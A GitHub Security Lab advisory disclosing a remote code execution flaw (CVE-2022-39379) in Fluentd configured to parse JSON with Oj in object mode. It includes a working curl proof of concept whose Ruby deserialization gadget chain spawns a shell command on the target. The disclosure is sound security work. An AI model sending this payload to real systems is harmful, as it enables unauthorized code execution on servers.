GHSL-2022-067: Remote Code Execution (RCE) in Fluentd - CVE-2022-39379

Coordinated Disclosure Timeline

• 2022-10-05: Sent report to Fluentd maintainers
• 2022-10-05: Maintainers acknowledged receiving the report
• 2022-11-02: Advisory was published

Summary

A remote code execution (RCE) vulnerability in non-default configurations of Fluentd allowed unauthenticated attackers to execute arbitrary code via specially crafted JSON payloads.

Product

Fluentd

Tested Version

• Fluentd v1.15.1

Details

Issue: Remote code execution due to insecure deserialization (in non-default configuration) (GHSL-2022-067)

Fluentd uses Oj as its JSON parser of choice if it’s installed. Fluentd allows to configure the JSON parsing mode of Oj and explicitly allows to set it to object. When Oj.load is used in the object-mode, arbitrary Ruby objects can be deserialized. Deserializing untrusted data using any method that allows the construction of arbitrary objects is easily exploitable and, in many cases, allows an attacker to execute arbitrary code. So-called “gadget chains” that allow code execution exist for all versions of Ruby.

Important: The default configuration of Fluentd is not vulnerable.

Proof of concept (for Ruby 2.x)

Requirements:

• Oj gem is installed on the system running Fluentd (Fluentd will then use Oj as its JSON parser of choice)
• Fluentd v1.13.2 or later is in use. The possibility to configure Oj via environment variables was introduced with v1.13.2.
• FLUENT_OJ_OPTION_MODE environment variable is set to object (e.g., by executing export FLUENT_OJ_OPTION_MODE=object on the command line)
• Fluentd is configured to use a JSON parser (e.g.: the config below starts a webserver to allow ingestion of logs via HTTP interface):

<source>
  @type http
  @id http_input
  <parse>
    @type json
  </parse>

  port 8888
</source>

After we start Fluentd, it’s now possible to remotely attack it with the following deserialization gadget chain which creates the file /tmp/pwned.txt on the attacked Fluentd system.

curl -X POST -d '{"^#1":[[{"^c":"Gem::SpecFetcher"},{"^c":"Gem::Installer"},{"^o":"Gem::Requirement","requirements":{"^o":"Gem::Package::TarReader","io":{"^o":"Net::BufferedIO","io":{"^o":"Gem::Package::TarReader::Entry","read":0,"header":"any"},"debug_output":{"^o":"Net::WriteAdapter","socket":{"^o":"Gem::RequestSet","sets":{"^o":"Net::WriteAdapter","socket":{"^c":"Kernel"},"method_id":":spawn"},"git_set":"touch /tmp/pwned.txt"},"method_id":":resolve"}}}}],"any"]}' http://localhost:8888/debug.test

Successful exploitation will result in the creation of a /tmp/pwned.txt file on the attacked Fluentd system. (Note that the vulnerability can also be exploited by providing the above JSON based log payload via other interfaces of Fluentd (e.g., via console))

Please note:

• The above payload for Ruby 2.x is based on a gadget chain for Marshal.load originally discovered by William Bowling aka vakzz.
• A payload for Oj.load such as the one above can be found in this blog post from Bishop Fox.
• We are in possession of an undisclosed Oj.load payload for Ruby 3.x, that is based on the newest Marshal.load gadget chain from William Bowling.

Impact

This issue may lead to Remote code execution (RCE) if vulnerable configurations are used.

CVE

• CVE-2022-39379

Credit

This issue was discovered and reported by GHSL team member @p- (Peter Stöckli).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2022-067 in any communication regarding this issue.